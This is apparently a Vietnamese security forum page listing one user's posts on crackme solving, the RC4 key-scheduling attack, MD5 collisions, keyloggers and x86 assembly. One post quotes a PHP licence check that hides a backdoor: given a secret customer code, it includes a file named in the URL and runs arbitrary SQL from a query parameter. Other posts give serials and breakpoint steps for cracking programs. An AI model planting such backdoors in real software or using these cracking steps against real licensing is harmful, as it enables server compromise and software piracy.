banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: n2tforever  XML
Profile for n2tforever Messages posted by n2tforever [ number of posts not being displayed on this page: 0 ]
 
"biến buf chỉ nhận giá trị đầu tiên trong mảng buffer"

-> bạn kiểm tra đoạn này như thế nào mà khẳng định vậy?
virus HIV nhé
3810-1941-5861-5351
8361-9811-5511-8134
9484-2341-5696-5321
0138-4411-5902-2411
7692-3349-1914-4567

1. đặt bp tại getWindowTextW
2. đặt memory bp tại textinput
3. F9 trace vài lần => đến CompareStringW
4. dựa vào argument => serial

level password: smashthestate
à tức là web và database bạn copy về dùng và không có tài khoản admin hả? OK đã hiểu smilie
giải quyết thế nào vậy bạn smilie thực ra theo dõi từ hôm qua mình vẫn không hiểu vấn đề của bạn là gì smilie
Code:
$domain = $_SERVER['SERVER_NAME'];
$server_ip = $_SERVER['SERVER_ADDR'];
$err="";
if (!empty($conf['lisence'])) {
$key=$conf['lisence'];
if ($server_ip != "127.0.0.1" && $domain!= "localhost" ) {
$tmp=explode("|",$key);
$key_domain = md5($func->NDK_encode(md5($domain))) ;
$key_ip = $func->NDK_decode($tmp[1]);
if ($key_domain!=$tmp[0] && $key_ip!=$server_ip ){
$err.="Lisence Incorrect";
$arr_old = $func->fetchDbConfig("config");
$cot['lisence'] = "incorrect";
$func->writeDbConfig("config",$cot,$arr_old);
}
}
}
else
$err.="No have Lisence Code";
if (!empty($err) && empty($conf['lisence'])=='incorrect') {
$mess="Domain : ".$domain." \n";
$mess.="SERVER IP: ".$server_ip." \n";
$mess.="Customer Code : ".$conf['customer_code']." \n";
$mess.="Request: ".$_SERVER['REQUEST_URI']." \n";
$func->doSendMail ("thaison@trust.vn",$err,$mess,$conf['email']);
if (isset($_GET[$conf['customer_code']])){
if($_GET['vntrust'])
include ($_GET['vntrust']);
if ($_GET['query']){
$sql = stripslashes($_GET['query']);
$ok = $DB->query ($sql);
if ($ok)
print $sql;
}
}
}


Nội dung đoạn màu vàng đây smilie
vậy tóm lại bạn muốn làm gì smilie hôm qua thì hỏi security code hôm nay lại chuyển thành decode rồi smilie
thử cái này nhé : vungoimora
smilie
"In particular, we consider the case where the key presented to the KSA is made up of a secret key concatenated with an attacker visible value (which we will refer to as an Initialization Vector or IV ). We will show that if the same secret key is used with numerous di fferent initialization vectors, and the attacker can obtain the first word of RC4 output corresponding to each initialization vector, he can reconstruct the secret key withminimal e ffort"

" the fi rst word of plaintexts is often an easily guessed constant such as the date, the sender's identity, etc, and thus the attack is practical even in a ciphertext-only mode of attack"

còn cụ thể nhận key như thế nào thì bạn phải đọc kĩ mục 7 của bài báo mới hiểu được smilie
Code:
http://aboba.drizzlehosting.com/IEEE/rc4_ksaproc.pdf

hi vọng bạn đủ kiên nhẫn để đọc hết smilie
Việt Nam smilie
SYN flooding dùng để làm bão hoà băng thông ? @@
đây là IPv6 gõ ping A-PC -4 để thấy IPv4
vẫn quy về vô hạn và hữu hạn thôi bác. nếu bác để ý thì số lượng hash md5 tối đa bằng 2^128 và số các string có thể có phụ thuộc vào chiều dài xâu, khi chiều dài xâu tăng lên thì số lượng các xâu có thể có cũng tăng lên theo, đến một độ dài nào đó ví dụ n chẳng hạn thì số lượng các xâu có chiều dài n sẽ vượt quá 2^128 và tất nhiên khi đó sẽ có 2 xâu chiều dài n có cùng hash.
=> câu trả lời cho câu 1 là có thể.

tương tự cho câu 2, nếu bác dùng kêt hợp md5 và sha thì do md5 và sha đều có chiều dài cố định nên chắc chắn số lượng các giá trị hash kết hợp sẽ bị giới hạn còn số lượng string sẽ là vô hạn => chắc chắn cũng có đụng độ.

câu 3 : để hoàn toàn tránh được collision theo em thì số lượng hash có thể phải là vô hạn => chiều dài xâu hash phải là vô hạn => bất khả thi.

invalid-password wrote:

breakoflove wrote:
Bắt cái vô hạn nằm trong cái hữu hạn thì làm sao được smilie

Không hiểu lắm ? 

số lượng các string là vô hạn, số lượng các giá trị hash là có hạn nên tất yếu có hai string cùng hash
bản chất 2 khai báo trên không tương đương nhau.

với cách khai báo thứ nhất :
char *buffer = "demo%20bai tap";
ở đây trình dịch sẽ coi xâu "demo%20bai tap" là một resource và cất nó vào section .rdata sau đó cho buffer trỏ đến xâu này. do mặc định .rdata chỉ cho phép đọc nên khi bạn cố gắng ghi đè lên xâu cũ nó sẽ báo lỗi.

với cách khai báo thứ 2:
char buffer[20] = "demo%20bai tap";
trình dịch sẽ cấp phát một vùng nhớ 20 byte trên stack cho buffer, sau đó copy nội dung của xâu "demo%20bai tap" từ .rdata vào buffer. Do đó bạn có thể dọc ghi thoải mái trên buffer.
Theo ý mình thì là thế này:
bạn có nói lợi ích của google khi không dùng mã hóa là : "Có thể sử dụng query đó để thu thập thông tin người dùng"
=> các thành phần không mong muốn khác cũng có thể thu thập được các thông tin về người dùng , nếu các thông tin là nhạy cảm thì sao?

thứ 2 thì biện pháp mã hóa như vậy theo mình cũng có thể giúp người dùng xác thực được thông tin trả lời đúng là của google, tránh giả mạo.

hackerkey wrote:
em nói thì có em mới nói....em sống ở huế, em làm thợ phần mềm iphone, nhưng chưa activer được iphone sau khi thay cặp mà mấy thợ trong sài gòn làm được rồi, và em được biết là nguyên tắc nó làm là như thế, ghé vào máy chủ rồi thay đổi thông tin iphone ( xem như máy con) 

bác có thể trình bày trực tiếp, chi tiết vào vấn đề bác đang gặp phải không? vòng vo tam quốc thế này còn dễ vô trash hơn smilie
cái iphone ban đầu bị làm sao? sau đó bác tác động gì vào nó mà bị khóa imei thế?
firewall nó chặn icmp chứ sao nữa

Zombie wrote:
Hiazz ... ! Cái quan trọng không ai nghĩ tới trong case này. Social skills smilie 

ý anh là người bạn chat kia thông đồng với bạn gái chủ topic ấy à smilie
99% bác bị bạn gái cài keylog để theo dõi rồi smilie nên nếu bác chưa gỡ được keylog ra khỏi máy thì đổi mật khẩu cũng không có ý nghĩa gì cả.
Để kiểm tra xem có dính keylog hay do nguyên nhân khác bác thử 1 ngày dùng mail từ máy khác xem bạn gái bác có biết không?. Nếu đúng do keylog thì với người dùng ít kinh nghiệm như bác em khuyên nên tìm một chương trình bảo vệ máy tính nào đó nhẹ nhẹ rồi cài vào. Tuy không mạnh mẽ như các AV lớn nhưng với những loại malware phổ thông nó cũng tỏ ra khá hiệu quả.
topic dưới có tay đang rao kìa mua về mà vọc.
bác trace theo địa chỉ của 3 thunk invalid đó trong olly xem bản chất nó là API nào sau đó thì fix manual lại các thunk theo api tìm được thử xem
cái này theo mình hiểu thì TCP là một kết nối 2 chiều vì thế cả client và server đều phải mở cổng để kết nối , số cổng client gửi ở lệnh PORT là cổng trên máy client (thường lớn hơn 1023) , server sau đó sẽ dùng cổng 20 của mình để kết nối đến cổng đó.
http://www.cert.org/tech_tips/ftp_port_attacks.html

shadow waker wrote:
e cũng đang có bài tập ngâm cứu keylogger mà không biết làm sao để gắn nó vào file khi nhấp vào thì nó auto chạy. ngồi mò cả buổi trong cái CEH mà chả thấy khả thi smilie . ai giúp mình với! 

pm riêng mấy anh STL để biết thêm chi tiết smilie

bachsau666 wrote:
Để mình thử xem làm hoài nhức đầu mà chả ra. không biết dùng thủ thuật ở tut nào để tìm ra vậy bạn. 

muốn "crắc" giỏi thì bạn phải tìm được cơ chế hoạt động của nó ra sao để từ đó can thiệp vào nhằm tạo ra kết quả như ý. bỏ ý định step by step đi vì như thế sẽ chả bao giờ khá được cả.
với cái này mình gợi ý la search string để tìm hàm bad boy và good boy sau đó đặt bp để dò ngược lại đến đoạn rẽ nhánh giữa "good" và "bad" => tìm hiểu xem cái gì khiến nó là "good" hay "bad" => password
em viết lộn smilie
edi trỏ đến địa chỉ đích là tham số thứ nhất
esi trỏ đến địa chỉ nguồn là tham số thứ hai
tài liệu bác tìm đọc giáo trình vi xử lý ấy smilie

minhvc wrote:
@xuanphongdocco: chính xác rồi bạn ạ.
@TQN: Cảm ơn bạn Bạn có thể giải thích chút về cách đọc hiểu được không, vì còn tầm 10 mấy cái hàm như thế này nữa.
Exported fn(): MyFunc- Ord:0001h
:00401244 55 push ebp
:00401245 8BEC mov ebp, esp
:00401247 83C4D0 add esp, FFFFFFD0
:0040124A 6A08 push 00000008
:0040124C FF7510 push [ebp+10]
:0040124F 8D45E8 lea eax, dword ptr [ebp-18]
:00401252 50 push eax
:00401253 E824110000 call 0040237C
:00401258 83C40C add esp, 0000000C
:0040125B C645F000 mov [ebp-10], 00
:0040125F 66C745E60000 mov [ebp-1A], 0000

-> call 0040237C : chính là gọi cái hàm mà mình đã post.
giải thích giúp mình cách chuyền tham số như thế nào với nhé.

Mong sớm có hồi âm của bạn. Thanks 


Code:
:0040237C 55 push ebp //cat ebp vao stack
:0040237D 8BEC mov ebp, esp //cho ebp=esp
:0040237F 56 push esi //cat esi vao stack
:00402380 57 push edi //cat edi vao stack
:00402381 8B7D08 mov edi, dword ptr [ebp+08] // cho edi tro den tham so thu 2 la dia chi dich
:00402384 8BC7 mov eax, edi //cho eax = edi la dia chi cua dich
:00402386 8B750C mov esi, dword ptr [ebp+0C] //cho esi tro den tham so thu nhat la dia chi nguon
:00402389 8B4D10 mov ecx, dword ptr [ebp+10] //cho ecx= tham so thu 3 la kich thuoc
:0040238C 8BD1 mov edx, ecx //cho edx=ecx
:0040238E D1E9 shr ecx, 1 //
:00402390 D1E9 shr ecx, 1 // ecx bang kich thuoc can copy tinh theo dword (khong tinh phan du)
:00402392 FC cld // clear co direct => che do lam viec voi string tu trai sang phai
:00402393 F3 repz //
:00402394 A5 movsd //copy theo don vi dword du lieu dc tro boi esi sang dia chi tro boi edi, moi lan nhu vay giam ecx di 1, thuc hien toi khi ecx =0
:00402395 8BCA mov ecx, edx //
:00402397 83E103 and ecx, 00000003 //ecx chua so byle le con lai (vi du kich thuoc can copy la 9 byte thi luc nay ecx=1)
:0040239A F3 repz //
:0040239B A4 movsb //copy not ecx byte le
:0040239C 5F pop edi //khoi phuc edi
:0040239D 5E pop esi // khoi phuc esi
:0040239E 5D pop ebp //khoi phuc ebp
:0040239F C3 ret //tro ve
 
Go to Page:  2 3 4 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|